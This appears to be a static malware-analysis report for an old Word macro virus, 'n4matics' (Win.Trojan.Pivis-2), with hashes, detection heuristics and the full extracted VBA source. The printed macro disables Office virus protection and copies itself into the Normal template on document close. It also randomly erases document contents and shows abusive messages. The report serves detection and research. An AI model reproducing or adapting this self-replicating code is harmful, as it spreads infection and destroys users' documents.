Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 9694840fb999e49b…

MALICIOUS

Office (OLE)

40.0 KB Created: 2002-05-11 20:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b5d75c7879ec3fa1fdb7db399edf788e SHA-1: ddc773a044773349c5e4361e07646d4639a4afdc SHA-256: 9694840fb999e49bd9c8f52bb66bdacf4d61a6332cbaa91739d0bbdbc8479760
248 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro markers and a VBA Auto_Close macro, indicating a malicious intent to spread. The embedded VBA script explicitly states 'n4matics virus' and attempts to export and import its code to the NormalTemplate, suggesting a self-replicating mechanism. The ClamAV detection further confirms its malicious nature as Win.Trojan.Pivis-2.

Heuristics 5

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3361 bytes
SHA-256: 9c5920f50a286572ac8e715757ee6214c54e6f7935dffe5f6ca796dcbf44f8d0
Detection
ClamAV: Doc.Trojan.Intruded-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "n4matics"
'name: n4matics virus
'author: ppacket
'date: feb 08 2k1

Private Sub infect()
On Error Resume Next
    
    Dim Nactive, Aactive As Boolean
        
    WordBasic.DisableAutoMacros 0
   
    With Application
        .UserName = "ppacket"
        .DisplayStatusBar = False
        .ScreenUpdating = False
    End With
    
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "ppacket"
        .Comments = "shit 2 all d students n staff of informatics sm fairview" & vbCr & _
                  "fuck you all"
        .Title = "ppacket's time to shine: informatics virus"
        .Execute
    End With
    
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    
    Set NTI = NormalTemplate.VBProject.VBComponents
    Set ADI = ActiveDocument.VBProject.VBComponents
    
    If NTI.Item("n4matics").Name <> "n4matics" Then
    ADI("n4matics").export "c:\n4mat.ics"
    Nactive = True
    ElseIf ADI.Item("n4matics").Name <> "n4matics" Then
    NTI("n4matics").export "c:\n4mat.ics"
    Aactive = True
    End If
    
    If Nactive Then
    NTI.import "c:\n4mat.ics"
    NormalTemplate.Save
    ElseIf Aactive Then
    ADI.import "c:\n4mat.ics"
    ActiveDocument.Save
    End If
    Kill ("c:\n4mat.ics")
    
    Randomize
    trigger = shit & damn & Int((66 * Rnd) + 1)
     
    If trigger = 26 Then
        Call Payback
    End If
    
End Sub

Sub AutoClose()
On Error Resume Next

    Call infect

    If opendocument.Saved = False Then
        opendocument.SaveAs FileName:=ActiveDocument.FullName
    End If

    ActiveDocument.Close savechanges = wdSaveChanges

End Sub

Private Sub Payback()
On Error Resume Next

    Randomize
    trigger = shit & damn & Int((99 * Rnd) + 1)
    If trigger = 10 Then
        Selection.WholeStory
        Selection.Delete unit:=wdCharacter, Count:=1
        With Selection.Font
        .Name = Arial
        .ColorIndex = wdGray50
        .Animation = wdAnimationShimmer
        .Size = 26
        .Position = center
        End With
            
        Selection.InsertBefore "Hehehehehehehehehehe" & vbCr & _
                               "You've been intruded" & vbCr & _
                                "By n4matics virus!!!"
        If ActiveDocument.Saved = False Then
            ActiveDocument.Save
        End If
    End If
    
    With Assistant
    .Visible = True
    .MoveWhenInTheWay = True
    .Animation = msoAnimationGetArtsy
    .Left = trigger
    .Visible = True
    End With

    With Assistant.NewBalloon
    .Icon = msoCritical
    .Heading = "n4matics Virus"
    .Text = "You've been intruded by" & vbCr & _
            "  those fucking ppl @ " & vbCr & _
            "informatics SM fairview"
    .Show
    End With

End Sub

Sub toolsmacro()

Call Payback

End Sub

Sub viewvbcode()

Call Payback

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.